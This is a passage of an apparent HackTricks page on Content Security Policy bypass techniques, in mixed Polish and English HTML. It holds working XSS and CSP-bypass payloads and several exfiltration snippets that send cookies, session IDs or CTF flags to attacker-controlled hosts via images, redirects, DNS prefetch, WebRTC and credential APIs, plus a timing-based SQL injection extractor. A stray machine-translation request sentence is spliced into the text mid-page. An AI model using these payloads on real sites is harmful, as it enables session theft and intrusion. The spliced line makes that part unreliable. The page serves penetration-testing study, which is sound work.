src="https://www.googleapis.com/customsearch/v1?callback=alert(1)"> </code></pre> <p>Other JSONP arbitrary execution endpoints can be found in <a href="https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt"><strong>here</strong></a> (some of them were deleted or fixed)</p> <h3 id="bypass-via-redirection"><a class="header" href="#bypass-via-redirection">Bypass via Redirection</a></h3> <p>Co się dzieje, gdy CSP napotyka przekierowanie po stronie serwera? Jeśli przekierowanie prowadzi do innego origin, który nie jest dozwolony, nadal zostanie zablokowane.</p> <p>Jednak zgodnie z opisem w <a href="https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects">CSP spec 4.2.2.3. Paths and Redirects</a>, jeśli przekierowanie prowadzi do innej ścieżki, może to obejść pierwotne ograniczenia.</p> <p>Oto przykład:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><!DOCTYPE html> <html> <head> <meta http-equiv="Content-Security-Policy" content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" /> </head> <body> <div id="userContent"> <script src="https://https://www.google.com/test"></script> <script src="https://https://www.google.com/a/test"></script> <script src="http://localhost:5555/301"></script> </div> </body> </html> </code></pre> <p>If CSP is set to <code>https://www.google.com/a/b/c/d</code>, since the path is considered, both <code>/test</code> and <code>/a/test</code> scripts will be blocked by CSP.</p> <p>However, the final <code>http://localhost:5555/301</code> will be <strong>redirected on the server-side to <code>https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//</code></strong>. Since it is a redirection, the <strong>path is not considered</strong>, and the <strong>script can be loaded</strong>, thus bypassing the path restriction.</p> <p>With this redirection, even if the path is specified completely, it will still be bypassed.</p> <p>Therefore, the best solution is to ensure that the website does not have any open redirect vulnerabilities and that there are no domains that can be exploited in the CSP rules.</p> <h3 id="bypass-csp-with-dangling-markup"><a class="header" href="#bypass-csp-with-dangling-markup">Bypass CSP with dangling markup</a></h3> <p>Przeczytaj, jak to zrobić: <a href="../dangling-markup-html-scriptless-injection/index.html">tutaj</a>.</p> <h3 id="unsafe-inline-img-src--via-xss"><a class="header" href="#unsafe-inline-img-src--via-xss">'unsafe-inline'; img-src *; via XSS</a></h3> <pre><code>default-src 'self' 'unsafe-inline'; img-src *; </code></pre> <p><code>'unsafe-inline'</code> oznacza, że możesz wykonać dowolny skrypt w samym kodzie (XSS może wykonać kod), a <code>img-src *</code> oznacza, że możesz na stronie użyć dowolnego obrazu z dowolnego źródła.</p> <p>Możesz obejść tę CSP, eksfiltrowując dane za pomocą obrazów (w tym przypadku XSS wykorzystuje CSRF, gdzie strona dostępna przez bota zawiera SQLi i dzięki temu można wydobyć flagę za pomocą obrazu):</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript"><script> fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_) </script> </code></pre> <p>From: <a href="https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle">https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle</a></p> <p>Możesz też wykorzystać tę konfigurację do <strong>wczytania kodu javascript osadzonego w obrazie</strong>. Jeśli na przykład strona pozwala na ładowanie obrazów z Twittera. Możesz <strong>zaprojektować</strong> <strong>specjalny obraz</strong>, <strong>przesłać</strong> go na Twittera i nadużyć opcji "<strong>unsafe-inline</strong>", aby <strong>wykonać</strong> kod JS (jak zwykłe XSS), który <strong>wczyta</strong> <strong>obraz</strong>, <strong>wyodrębni</strong> z niego <strong>JS</strong> i <strong>wykona</strong> <strong>go</strong>: <a href="https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/">https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/</a></p> <h3 id="z-service-workers"><a class="header" href="#z-service-workers">Z Service Workers</a></h3> <p>Service workers <strong><code>importScripts</code></strong> funkcja nie jest ograniczona przez CSP:</p> <p><a class="content_ref" href="../xss-cross-site-scripting/abusing-service-workers.html"><span class="content_ref_label">Abusing Service Workers</span></a></p> <h3 id="policy-injection"><a class="header" href="#policy-injection">Policy Injection</a></h3> <p><strong>Badania:</strong> <a href="https://portswigger.net/research/bypassing-csp-with-policy-injection"><strong>https://portswigger.net/research/bypassing-csp-with-policy-injection</strong></a></p> <h4 id="chrome"><a class="header" href="#chrome">Chrome</a></h4> <p>Jeśli <strong>parametr</strong> wysyłany przez Ciebie jest <strong>wklejany wewnątrz</strong> <strong>deklaracji</strong> <strong>polityki</strong>, to możesz w pewien sposób <strong>zmodyfikować</strong> <strong>politykę</strong>, tak że stanie się <strong>bezużyteczna</strong>. Możesz <strong>zezwolić na skrypty 'unsafe-inline'</strong> przy użyciu któregokolwiek z tych obejść:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">bash</span></div> <pre><code class="language-bash">script-src-elem *; script-src-attr * script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline' </code></pre> <p>Ponieważ ta dyrektywa <strong>nadpisze istniejące dyrektywy script-src</strong>.<br /> You can find an example here: <a href="http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E">http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=%3Bscript-src-elem+*&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E</a></p> <h4 id="edge"><a class="header" href="#edge">Edge</a></h4> <p>W Edge jest to znacznie prostsze. Jeśli możesz dodać do CSP tylko to: <strong><code>;_</code></strong> <strong>Edge</strong> usunie całą <strong>politykę</strong>.<br /> Example: <a href="http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E">http://portswigger-labs.net/edge_csp_injection_xndhfye721/?x=;_&y=%3Cscript%3Ealert(1)%3C/script%3E</a></p> <h3 id="img-src--via-xss-iframe---time-attack"><a class="header" href="#img-src--via-xss-iframe---time-attack">img-src *; via XSS (iframe) - Time attack</a></h3> <p>Notice the lack of the directive <code>'unsafe-inline'</code><br /> Tym razem możesz sprawić, że ofiara <strong>załaduje</strong> stronę pod <strong>twoją kontrolą</strong> za pomocą <strong>XSS</strong> w <code><iframe</code>. Tym razem sprawisz, że ofiara uzyska dostęp do strony, z której chcesz wyciągnąć informacje (<strong>CSRF</strong>). Nie masz dostępu do treści strony, ale jeśli w jakiś sposób możesz <strong>kontrolować czas ładowania strony</strong>, możesz wydobyć potrzebne informacje.</p> <p>Tym razem zostanie wydobyty <strong>flag</strong> — za każdym razem, gdy <strong>char</strong> zostanie poprawnie odgadnięty przez SQLi, <strong>odpowiedź</strong> zajmuje <strong>więcej czasu</strong> z powodu funkcji sleep. Wtedy będziesz w stanie wyodrębnić flag:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"> <iframe name="f" id="g"></iframe> // The bot will load an URL with the payload <script> let host = "http://x-oracle-v1.nn9ed.ka0labs.org" function gen(x) { x = escape(x.replace(/_/g, "\\_")) return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag%20like%20'${x}%25'and%201=sleep(0.1)%23` } function gen2(x) { x = escape(x) return `${host}/admin/search/x'union%20select(1)from%20challenge%20where%20flag='${x}'and%201=sleep(0.1)%23` } async function query(word, end = false) { let h = performance.now() f.location = end ? gen2(word) : gen(word) await new Promise((r) => { g.onload = r }) let diff = performance.now() - h return diff > 300 } let alphabet = "_abcdefghijklmnopqrstuvwxyz0123456789".split("") let postfix = "}" async function run() { let prefix = "nn9ed{" while (true) { let i = 0 for (i; i < alphabet.length; i++) { let c = alphabet[i] let t = await query(prefix + c) // Check what chars returns TRUE or FALSE console.log(prefix, c, t) if (t) { console.log("FOUND!") prefix += c break } } if (i == alphabet.length) { console.log("missing chars") break } let t = await query(prefix + "}", true) if (t) { prefix += "}" break } } new Image().src = "http://PLAYER_SERVER/?" + prefix //Exfiltrate the flag console.log(prefix) } run() </script> </code></pre> <h3 id="za-pomocą-bookmarklets"><a class="header" href="#za-pomocą-bookmarklets">Za pomocą Bookmarklets</a></h3> <p>Ten atak wymagałby pewnego social engineeringu, w którym atakujący <strong>przekonuje użytkownika do przeciągnięcia i upuszczenia linku na bookmarklet w przeglądarce</strong>. Ten bookmarklet zawierałby <strong>malicious javascript</strong> code, który po przeciągnięciu i upuszczeniu lub kliknięciu zostanie wykonany w kontekście bieżącego okna przeglądarki, <strong>omijając CSP i pozwalając na kradzież wrażliwych informacji</strong> takich jak cookies lub tokens.</p> <p>For more information <a href="https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/"><strong>check the original report here</strong></a>.</p> <h3 id="omijanie-csp-przez-ograniczenie-csp"><a class="header" href="#omijanie-csp-przez-ograniczenie-csp">Omijanie CSP przez ograniczenie CSP</a></h3> <p>W <a href="https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution"><strong>tym CTF writeup</strong></a>, CSP jest obejściowe przez wstrzyknięcie wewnątrz dozwolonego iframe bardziej restrykcyjnego CSP, który zabraniał ładowania konkretnego pliku JS, co następnie poprzez <strong>prototype pollution</strong> lub <strong>dom clobbering</strong> pozwoliło <strong>wykorzystać inny skrypt do załadowania dowolnego skryptu</strong>.</p> <p>You can <strong>restrict a CSP of an Iframe</strong> with the <strong><code>csp</code></strong> attribute:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><iframe src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]" csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe> </code></pre> <p>W <a href="https://github.com/aszx87410/ctf-writeups/issues/48"><strong>this CTF writeup</strong></a>, było możliwe poprzez <strong>HTML injection</strong> dodatkowo <strong>ograniczyć</strong> <strong>CSP</strong>, w wyniku czego skrypt zapobiegający <strong>CSTI</strong> został wyłączony i w konsekwencji <strong>luka stała się wykorzystywalna.</strong><br /> CSP można uczynić bardziej restrykcyjnym za pomocą <strong>HTML meta tags</strong>, a inline scripts można wyłączyć poprzez <strong>usunięcie</strong> <strong>wpisu</strong> pozwalającego na ich <strong>nonce</strong> i umożliwiającego włączenie konkretnego inline script via <strong>sha</strong>:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-eval' 'strict-dynamic' 'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4=' 'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';" /> </code></pre> <h3 id="js-exfiltration-przy-użyciu-content-security-policy-report-only"><a class="header" href="#js-exfiltration-przy-użyciu-content-security-policy-report-only">JS exfiltration przy użyciu Content-Security-Policy-Report-Only</a></h3> <p>Jeśli uda ci się sprawić, że serwer będzie odpowiadać nagłówkiem <strong><code>Content-Security-Policy-Report-Only</code></strong> z <strong>wartością kontrolowaną przez ciebie</strong> (może z powodu CRLF), możesz skierować go na swój serwer, a jeśli <strong>opakujesz</strong> <strong>JS content</strong>, który chcesz exfiltrate, w <strong><code><script></code></strong> i ponieważ bardzo prawdopodobne jest, że <code>unsafe-inline</code> nie jest dozwolone przez CSP, to spowoduje to <strong>wywołanie błędu CSP</strong> i część skryptu (zawierająca wrażliwe informacje) zostanie wysłana do serwera przez <code>Content-Security-Policy-Report-Only</code>.</p> <p>Dla przykładu <a href="https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes"><strong>check this CTF writeup</strong></a>.</p> <h3 id="cve-2020-6519"><a class="header" href="#cve-2020-6519"><a href="https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/">CVE-2020-6519</a></a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">document.querySelector("DIV").innerHTML = '<iframe src=\'javascript:var s = document.createElement("script");s.src = "https://pastebin.com/raw/dw5cWGK6";document.body.appendChild(s);\'></iframe>' </code></pre> <h3 id="leaking-informacji-przy-użyciu-csp-i-iframe"><a class="header" href="#leaking-informacji-przy-użyciu-csp-i-iframe">Leaking informacji przy użyciu CSP i Iframe</a></h3> <ul> <li>Tworzony jest <code>iframe</code>, który wskazuje na URL (nazwijmy go <code>https://example.redirect.com</code>), który jest dozwolony przez CSP.</li> <li>Ten URL następnie przekierowuje do sekretnego URL (np. <code>https://usersecret.example2.com</code>), który jest <strong>niedozwolony</strong> przez CSP.</li> <li>Nasłuchując zdarzenia <code>securitypolicyviolation</code>, można przechwycić właściwość <code>blockedURI</code>. Ta właściwość ujawnia domenę zablokowanego URI, leaking sekretnej domeny, na którą przekierowywał początkowy URL.</li> </ul> <p>Warto zauważyć, że przeglądarki takie jak Chrome i Firefox różnie obsługują <code>iframe</code> w kontekście CSP, co może prowadzić do potencjalnego leakage wrażliwych informacji z powodu niezdefiniowanego zachowania.</p> <p>Inna technika polega na wykorzystaniu samego CSP do odgadnięcia sekretnego subdomeny. Metoda ta opiera się na algorytmie wyszukiwania binarnego oraz modyfikowaniu CSP tak, aby zawierał konkretne domeny, które są celowo blokowane. Na przykład, jeśli sekretna subdomena składa się z nieznanych znaków, można iteracyjnie testować różne subdomeny poprzez modyfikację dyrektywy CSP, aby blokować lub pozwalać na te subdomeny. Oto fragment pokazujący, jak CSP może być skonfigurowany, aby ułatwić tę metodę:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">markdown</span></div> <pre><code class="language-markdown">img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev </code></pre> <p>Monitorując, które żądania są blokowane lub dozwolone przez CSP, można zawęzić możliwe znaki w sekretnej subdomenie, ostatecznie odkrywając pełny URL.</p> <p>Obie metody wykorzystują niuanse implementacji i zachowania CSP w przeglądarkach, pokazując jak pozornie bezpieczne polityki mogą mimowolnie powodować wyciek wrażliwych informacji.</p> <p>Trick from <a href="https://ctftime.org/writeup/29310"><strong>here</strong></a>.</p> <h2 id="niebezpieczne-technologie-do-obejścia-csp"><a class="header" href="#niebezpieczne-technologie-do-obejścia-csp">Niebezpieczne technologie do obejścia CSP</a></h2> <h3 id="php-errors-when-too-many-params"><a class="header" href="#php-errors-when-too-many-params">PHP Errors when too many params</a></h3> <p>Zgodnie z <a href="https://www.youtube.com/watch?v=Sm4G6cAHjWM"><strong>last technique commented in this video</strong></a>, wysłanie zbyt wielu parametrów (1001 parametrów GET — chociaż można to zrobić też z parametrami POST i ponad 20 plikami). Każde zdefiniowane <strong><code>header()</code></strong> w kodzie PHP <strong>nie zostanie wysłane</strong> z powodu błędu, który to spowoduje.</p> <h3 id="php-response-buffer-overload"><a class="header" href="#php-response-buffer-overload">PHP response buffer overload</a></h3> <p>PHP jest znane z buforowania odpowiedzi do 4096 bajtów domyślnie. W związku z tym, jeśli PHP pokazuje ostrzeżenie, dostarczając wystarczającą ilość danych w obrębie ostrzeżeń, odpowiedź zostanie wysłana <strong>przed</strong> nagłówkiem CSP, powodując, że nagłówek zostanie zignorowany.<br /> Technika polega zasadniczo na zapełnieniu bufora odpowiedzi ostrzeżeniami, tak aby nagłówek CSP nie został wysłany.</p> <p>Idea from <a href="https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points"><strong>this writeup</strong></a>.</p> <h3 id="kill-csp-via-max_input_vars-headers-already-sent"><a class="header" href="#kill-csp-via-max_input_vars-headers-already-sent">Kill CSP via max_input_vars (headers already sent)</a></h3> <p>Ponieważ nagłówki muszą być wysłane przed jakimkolwiek outputem, ostrzeżenia generowane przez PHP mogą unieważnić późniejsze wywołania <code>header()</code>. Jeśli dane od użytkownika przekroczą <code>max_input_vars</code>, PHP najpierw zgłosi ostrzeżenie startowe; każde kolejne <code>header('Content-Security-Policy: ...')</code> zakończy się błędem „headers already sent”, skutecznie wyłączając CSP i umożliwiając inaczej zablokowane reflective XSS.</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">php</span></div> <pre><code class="language-php"><?php header("Content-Security-Policy: default-src 'none';"); echo $_GET['xss']; </code></pre> <p>Proszę wstawić zawartość pliku README.md (albo wskazać fragment), który mam przetłumaczyć na polski. Zachowam dokładnie oryginalny markdown/HTML, nie przetłumaczę kodu, ścieżek, tagów ani linków zgodnie z wytycznymi.</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">bash</span></div> <pre><code class="language-bash"># CSP in place → payload blocked by browser curl -i "http://orange.local/?xss=<svg/onload=alert(1)>" # Exceed max_input_vars to force warnings before header() → CSP stripped curl -i "http://orange.local/?xss=<svg/onload=alert(1)>&A=1&A=2&...&A=1000" # Warning: PHP Request Startup: Input variables exceeded 1000 ... # Warning: Cannot modify header information - headers already sent </code></pre> <h3 id="przepisanie-strony-błędu"><a class="header" href="#przepisanie-strony-błędu">Przepisanie strony błędu</a></h3> <p>Z <a href="https://blog.ssrf.kr/69"><strong>this writeup</strong></a> wynika, że można było obejść ochronę CSP przez załadowanie strony błędu (potencjalnie bez CSP) i przepisanie jej zawartości.</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">a = window.open("/" + "x".repeat(4100)) setTimeout(function () { a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">` }, 1000) </code></pre> <h3 id="some--self--wordpress"><a class="header" href="#some--self--wordpress">SOME + 'self' + wordpress</a></h3> <p>SOME to technika, która wykorzystuje XSS (lub bardzo ograniczone XSS) <strong>w endpointcie strony</strong>, aby <strong>nadużyć</strong> <strong>innych endpointów tej samej origin.</strong> Odbywa się to przez załadowanie podatnego endpointu ze strony atakującego, a następnie odświeżenie tej strony do rzeczywistego endpointu w tej samej origin, który chcemy nadużyć. W ten sposób <strong>podatny endpoint</strong> może użyć obiektu <strong><code>opener</code></strong> w <strong>payloadzie</strong>, aby <strong>dostępować do DOM</strong> rzeczywistego endpointu przeznaczonego do nadużyć. Więcej informacji sprawdź:</p> <p><a class="content_ref" href="../xss-cross-site-scripting/some-same-origin-method-execution.html"><span class="content_ref_label">SOME - Same Origin Method Execution</span></a></p> <p>Co więcej, <strong>wordpress</strong> ma endpoint <strong>JSONP</strong> pod <code>/wp-json/wp/v2/users/1?_jsonp=data</code>, który <strong>odzwierciedli</strong> wysłane <strong>data</strong> w odpowiedzi (z ograniczeniem do liter, cyfr i kropek).</p> <p>Atakujący może wykorzystać ten endpoint do <strong>wygenerowania SOME attack</strong> przeciw WordPress i <strong>osadzić</strong> go wewnątrz <code><script s</code>rc=<code>/wp-json/wp/v2/users/1?_jsonp=some_attack></script></code> — zauważ, że ten <strong>script</strong> zostanie <strong>załadowany</strong>, ponieważ jest <strong>dozwolony przez 'self'</strong>. Ponadto, skoro WordPress jest zainstalowany, atakujący może wykorzystać <strong>SOME attack</strong> przez podatny <strong>callback</strong> endpoint, który <strong>omija CSP</strong>, aby nadać użytkownikowi więcej uprawnień, zainstalować nowy plugin... Dodatkowe informacje o wykonaniu tego ataku: <a href="https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/">https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/</a></p> <h2 id="csp-exfiltration-bypasses"><a class="header" href="#csp-exfiltration-bypasses">CSP Exfiltration Bypasses</a></h2> <p>Jeśli obowiązuje ścisła polityka CSP, która nie pozwala na <strong>interakcję z zewnętrznymi serwerami</strong>, są pewne metody, które zawsze możesz zastosować, aby wyeksfiltrować informacje.</p> <h3 id="location"><a class="header" href="#location">Location</a></h3> <p>Możesz po prostu zaktualizować location, aby wysłać na serwer atakującego tajne informacje:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">var sessionid = document.cookie.split("=")[1] + "." document.location = "https://attacker.com/?" + sessionid </code></pre> <h3 id="meta-tag"><a class="header" href="#meta-tag">Meta tag</a></h3> <p>Możesz przekierować, wstrzykując meta tag (to jest tylko przekierowanie, to nie spowoduje leak zawartości)</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><meta http-equiv="refresh" content="1; http://attacker.com" /> </code></pre> <h3 id="dns-prefetch"><a class="header" href="#dns-prefetch">DNS Prefetch</a></h3> <p>Aby szybciej ładować strony, przeglądarki będą wstępnie rozwiązywać nazwy hostów na adresy IP i zapisywać je w pamięci podręcznej do późniejszego użycia.<br /> Możesz wskazać przeglądarce, aby wstępnie rozwiązała nazwę hosta za pomocą: <code><link rel="dns-prefetch" href="something.com"></code></p> <p>Można nadużyć tego zachowania, aby <strong>exfiltrate sensitive information via DNS requests</strong>:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">var sessionid = document.cookie.split("=")[1] + "." var body = document.getElementsByTagName("body")[0] body.innerHTML = body.innerHTML + '<link rel="dns-prefetch" href="//' + sessionid + 'attacker.ch">' </code></pre> <p>Inny sposób:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">const linkEl = document.createElement("link") linkEl.rel = "prefetch" linkEl.href = urlWithYourPreciousData document.head.appendChild(linkEl) </code></pre> <p>Aby temu zapobiec, serwer może wysłać HTTP header:</p> <pre><code>X-DNS-Prefetch-Control: off </code></pre> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>Najwyraźniej ta technika nie działa w headless browsers (bots)</p> </div> <h3 id="webrtc"><a class="header" href="#webrtc">WebRTC</a></h3> <p>Na kilku stronach można przeczytać, że <strong>WebRTC nie sprawdza polityki <code>connect-src</code> w CSP</strong>.</p> <p>W rzeczywistości możesz <em>leak</em> informacje używając <em>DNS request</em>. Zobacz ten kod:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">;(async () => { p = new RTCPeerConnection({ iceServers: [{ urls: "stun:LEAK.dnsbin" }] }) p.createDataChannel("") p.setLocalDescription(await p.createOffer()) })() </code></pre> <p>Inna opcja:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">var pc = new RTCPeerConnection({ "iceServers":[ {"urls":[ "turn:74.125.140.127:19305?transport=udp" ],"username":"_all_your_data_belongs_to_us", "credential":"." }] }); pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); </code></pre> <h3 id="credentialscontainer"><a class="header" href="#credentialscontainer">CredentialsContainer</a></h3> <p>Wyskakujące okno z poświadczeniami wysyła zapytanie DNS do iconURL i nie jest ograniczane przez stronę. Działa tylko w kontekście bezpiecznym (HTTPS) lub na localhost.</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">navigator.credentials.store( new FederatedCredential({ id:"satoki", name:"satoki", provider:"https:"+your_data+"example.com", iconURL:"https:"+your_data+"example.com" }) ) </code></pre> <h2 id="sprawdzanie-polityk-csp-online"><a class="header" href="#sprawdzanie-polityk-csp-online">Sprawdzanie polityk CSP online</a></h2> <ul> <li><a href="https://csp-evaluator.withgoogle.com">https://csp-evaluator.withgoogle.com/</a></li> <li><a href="https://cspvalidator.org/#url=https://cspvalidator.org/">https://cspvalidator.org/</a></li> </ul> <h2 id="automatyczne-tworzenie-csp"><a class="header" href="#automatyczne-tworzenie-csp">Automatyczne tworzenie CSP</a></h2> <p><a href="https://csper.io/docs/generating-content-security-policy">https://csper.io/docs/generating-content-security-policy</a></p> <h2 id="Źródła-1"><a class="header" href="#Źródła-1">Źródła</a></h2> <ul> <li><a href="https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/">https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/</a></li> <li><a href="https://lcamtuf.coredump.cx/postxss/">https://lcamtuf.coredump.cx/postxss/</a></li> <li><a href="https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d">https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d</a></li> <li><a href="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme">https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme</a></li> <li><a href="https://www.youtube.com/watch?v=MCyPuOWs3dg">https://www.youtube.com/watch?v=MCyPuOWs3dg</a></li> <li><a href="https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/">https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/</a></li> <li><a href="https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/">https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/</a></li> <li><a href="https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket">https://cside.dev/blog/weaponized-google-oauth-triggers-malicious-websocket</a></li> <li><a href="https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/">The Art of PHP: CTF‑born exploits and techniques</a></li> </ul> <p></p> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>Ucz się i ćwicz Hacking AWS:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/arte"><strong>HackTricks Training AWS Red Team Expert (ARTE)</strong></a><img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><br /> Ucz się i ćwicz Hacking GCP: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/grte"><strong>HackTricks Training GCP Red Team Expert (GRTE)</strong></a><img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"> Ucz się i ćwicz Hacking Azure: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/azrte"><strong>HackTricks Training Azure Red Team Expert (AzRTE)</strong></a><img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"></p> <details> <summary>Wsparcie dla HackTricks</summary> <ul> <li>Sprawdź <a href="https://github.com/sponsors/carlospolop"><strong>plany subskrypcyjne</strong></a>!</li> <li><strong>Dołącz do</strong> 💬 <a href="https://discord.gg/hRep4RUj7f"><strong>grupy Discord</strong></a> lub <a href="https://t.me/peass"><strong>grupy telegramowej</strong></a> lub <strong>śledź</strong> nas na <strong>Twitterze</strong> 🐦 <a href="https://twitter.com/hacktricks_live"><strong>@hacktricks_live</strong></a><strong>.</strong></li> <li><strong>Dziel się trikami hackingowymi, przesyłając PR-y do</strong> <a href="https://github.com/carlospolop/hacktricks"><strong>HackTricks</strong></a> i <a href="https://github.com/carlospolop/hacktricks-cloud"><strong>HackTricks Cloud</strong></a> repozytoriów na githubie.</li> </ul> </details> </div> </main> <nav class="nav-wrapper" aria-label="Page navigation">  <a rel="prev" href="../../pentesting-web/command-injection.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i> </a> <a rel="next prefetch" href="../../pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <i class="fa fa-angle-right"></i> </a> <div style="clear: both"></div> </nav> <nav class="nav-wide-wrapper" aria-label="Page navigation"> <a rel="prev" href="../../pentesting-web/command-injection.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i><span style="font-size: medium; align-self: center; margin-left: 10px;">Command Injection</span> </a> <a rel="next prefetch" href="../../pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <span style="font-size: medium; align-self: center; margin-right: 10px;">CSP bypass: self + 'unsafe-inline' with Iframes</span><i class="fa fa-angle-right"></i> </a> </nav> </div> <div class="sidetoc"> <div class="sidetoc-wrapper"> <nav class="pagetoc"></nav> <a class="sidesponsor" href="" target="_blank"> <img src="" alt="" srcset=""> <div class="sponsor-title"> </div> <div class="sponsor-description"> </div> <div class="sponsor-cta"></div> </a> </div> </div> </div> <div class="footer"> <div id="theme-wrapper" class="theme-wrapper"> <div id="theme-btns" class="theme-btns"> <button id="hacktricks-light" type="button" role="radio" aria-label="Switch to light theme" aria-checked="false" class="theme"> <i class="fa fa-sun-o"></i> </button> <button id="hacktricks-dark" type="button" role="radio" aria-label="Switch to dark theme" aria-checked="false" class="theme theme-selected"> <i class="fa fa-moon-o"></i> </button> </div> </div> </div> </div> </div> <script> window.playground_copyable = true; </script> <script src="../../elasticlunr.min.js"></script> <script src="../../mark.min.js"></script>  <script src="../../clipboard.min.js"></script> <script 